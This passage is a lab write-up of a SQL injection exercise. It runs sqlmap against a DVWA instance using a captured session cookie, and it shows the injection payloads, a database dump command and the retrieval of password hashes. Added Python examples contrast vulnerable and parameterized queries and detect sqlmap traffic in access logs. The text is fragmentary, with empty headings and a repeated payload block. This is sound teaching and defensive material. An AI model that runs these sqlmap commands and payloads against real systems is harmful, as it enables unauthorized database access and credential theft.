Activities
To do so, you must use the SQLMap tool (installed on Kali by default).
You will have to:
Solution
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://10.0.1.102/dvwa_last/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: 10.0.1.102
In it we verify that the parameters sent are id and Submit, as had been seen
in the source code, and we note down the Cookie field to pass it to sqlmap.
With these data, sqlmap is launched on the Kali machine:
root@pc1:~# sqlmap -u 'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=3&Submit=Submit' --cookie='security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc'
[sqlmap 1.1.6#stable banner, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program
[19:34:52] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:34:52] [INFO] testing 'MySQL inline queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[19:34:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:34:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:35:03] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind'
injectable
[19:35:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] automatically extending ranges for UNION query injection technique tests
as there is at least one other (potential) technique found
[19:35:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range for
current UNION query injection technique test
[19:35:04] [INFO] target URL appears to have 2 columns in query
[19:35:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns'
injectable
[19:35:04] [WARNING] in OR boolean-based injection cases, please consider usage of switch
'--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 3731 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=3' OR NOT 1788=1788#&Submit=Submit
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT
(ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813
UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit
Therefore:
The id parameter IS vulnerable.
The Submit parameter is NOT vulnerable.
In addition, I run the previous command line again adding the -f option, to also obtain the exact
MySQL version, which is 5.0.51, which allows us to search for exploits (quite a few DoS ones
are found on exploit-db).
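As an added example (not code from the exercise, from DVWA or from sqlmap), the following Python script shows why a parameter spliced into the SQL text the way id is here behaves as injectable, and how binding it as a query parameter closes the hole. It uses an in-memory SQLite table with constructed rows rather than DVWA's real users table; because SQLite does not accept MySQL's `#` comment, the boolean-based payload reported above is written with the `-- ` comment form that sqlmap's error-based payload also uses. The `behaves_injectable` function reproduces the true/false comparison behind sqlmap's boolean-based blind finding, so it can double as a regression test that the hardened query stays safe.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed rows shaped like DVWA's users table (not the real dump).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # Assumed pattern (the exercise refers to the page's source code but does
    # not reproduce it): the untrusted id is spliced into the SQL text between
    # single quotes, so a quote inside the value ends the literal and whatever
    # follows is parsed as SQL.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    # Hardened form: the value is bound by the driver and never parsed as SQL.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


# sqlmap's boolean-based blind check, rewritten with the "-- " comment so that
# SQLite accepts it (the payload above used MySQL's "#"). The FALSE variant must
# leave the result unchanged and the TRUE variant must change it.
FALSE_PAYLOAD = "3' OR NOT 1788=1788-- hzfs"
TRUE_PAYLOAD = "3' OR NOT 1788=1789-- hzfs"


def behaves_injectable(lookup, conn: sqlite3.Connection) -> bool:
    """Regression check for a data-access function: True means the id value is
    interpreted as SQL, False means it is treated as an opaque literal."""
    baseline = lookup(conn, "3")
    unchanged = lookup(conn, FALSE_PAYLOAD) == baseline
    changed = lookup(conn, TRUE_PAYLOAD) != baseline
    return unchanged and changed


if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", behaves_injectable(lookup_vulnerable, db))
    print("parameterized query injectable:", behaves_injectable(lookup_parameterized, db))
```

With the concatenated query the TRUE payload returns every row of the table, which is exactly the "page changes" signal sqlmap keys on; with the bound parameter both payloads are compared as literal strings against user_id and match nothing, so the check reports the function as not injectable.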
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT
(ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813
UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit
Therefore, the available databases are dvwa, information_schema, metasploit,
mysql, owasp10, tikiwiki and tikiwiki195.
So the tables of the dvwa database are guestbook and users.
root@pc1:~# sqlmap -u 'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie 'security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -D dvwa --dump
+------------+------+-------------------------+
| comment_id | name | comment                 |
+------------+------+-------------------------+
| 1          | test | This is a test comment. |
+------------+------+-------------------------+
This yields the contents of the users and guestbook tables (highlighted in yellow in the
previous screenshot), as well as the passwords (stored as md5 hashes) of all the
users.
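As an added example on the detection side (not part of the write-up or of sqlmap), here is a small Python analyzer that a defender could run over web-server access logs to recognise a run like the one above after the fact. Its signatures come from the payloads sqlmap reported for the id parameter (the FLOOR(RAND(0)*2) and ELT error-based construct, the OR NOT n=n boolean probe, UNION SELECT) and from sqlmap's default User-Agent, which names the tool; the per-client rate check is motivated by the 3731 requests the run needed. The log format (Apache/nginx combined), the date, the client addresses and the log lines themselves are constructed, and the threshold of 20 requests per minute is an assumed tuning value.

```python
import re
from collections import Counter
from urllib.parse import quote, unquote_plus, urlsplit

# Apache/nginx "combined" log format (assumed; adjust the regex for other formats).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures taken from the payloads in the sqlmap output above plus the tool's
# default User-Agent. All are matched against the URL-decoded query string
# except the last, which is matched against the User-Agent header.
SIGNATURES = {
    "error-based (FLOOR/RAND)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "error-based (ELT)": re.compile(r"\bELT\s*\(", re.I),
    "boolean-based blind": re.compile(r"'\s*(OR|AND)\s+(NOT\s+)?\d+\s*=\s*\d+", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "sqlmap user-agent": re.compile(r"\bsqlmap\b", re.I),
}

RATE_THRESHOLD = 20  # requests per client, per path, per minute (assumed tuning value)


def analyze(lines):
    """Returns (hits, bursts): hits is a list of (client, signature, decoded query)
    and bursts a sorted list of (client, path) pairs that reached RATE_THRESHOLD."""
    hits = []
    per_minute = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the whole pass
        parts = urlsplit(m.group("path"))
        query = unquote_plus(parts.query)  # decode before matching, as sqlmap URL-encodes
        for name, pattern in SIGNATURES.items():
            haystack = m.group("ua") if name == "sqlmap user-agent" else query
            if pattern.search(haystack):
                hits.append((m.group("ip"), name, query[:60]))
        minute = m.group("ts")[:17]  # "19/Jun/2017:19:34:52 +0000" -> "19/Jun/2017:19:34"
        per_minute[(m.group("ip"), parts.path, minute)] += 1
    bursts = sorted({(ip, path) for (ip, path, _), n in per_minute.items() if n >= RATE_THRESHOLD})
    return hits, bursts


SQLI_PATH = "/dvwa_last/vulnerabilities/sqli/"
ATTACKER = "10.0.1.50"  # constructed client address


def sample_log():
    """Constructed access-log lines modelled on the requests in the write-up."""
    line = ('{ip} - - [19/Jun/2017:19:34:52 +0000] "GET {path} HTTP/1.1" 200 4321 '
            '"http://10.0.1.102' + SQLI_PATH + '" "{ua}"')
    browser = "Mozilla/5.0"
    tool = "sqlmap/1.1.6#stable (http://sqlmap.org)"
    payloads = [  # the two payloads sqlmap reported for the id parameter
        "3' OR NOT 1788=1788#",
        "3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3249=3249,1))),"
        "0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813 UNION SELECT 6164 "
        "UNION SELECT 3189)a GROUP BY x)-- hzfs",
    ]
    lines = [line.format(ip="10.0.1.20", path=f"{SQLI_PATH}?id=3&Submit=Submit", ua=browser)]
    for p in payloads:
        lines.append(line.format(ip=ATTACKER, path=f"{SQLI_PATH}?id={quote(p)}&Submit=Submit", ua=tool))
    # A scan also shows up as volume: 25 plain-looking requests from one client within a minute.
    for n in range(25):
        lines.append(line.format(ip=ATTACKER, path=f"{SQLI_PATH}?id={n}&Submit=Submit", ua=browser))
    return lines


if __name__ == "__main__":
    found, noisy = analyze(sample_log())
    for ip, name, q in found:
        print(f"{ip}  {name:26} {q}")
    print("rate-flagged:", noisy)
```

The signature matches catch the requests that carry recognisable payloads, while the per-minute counter flags the scanning client even for the plain-looking probes that carry none, which is why both checks are worth running together.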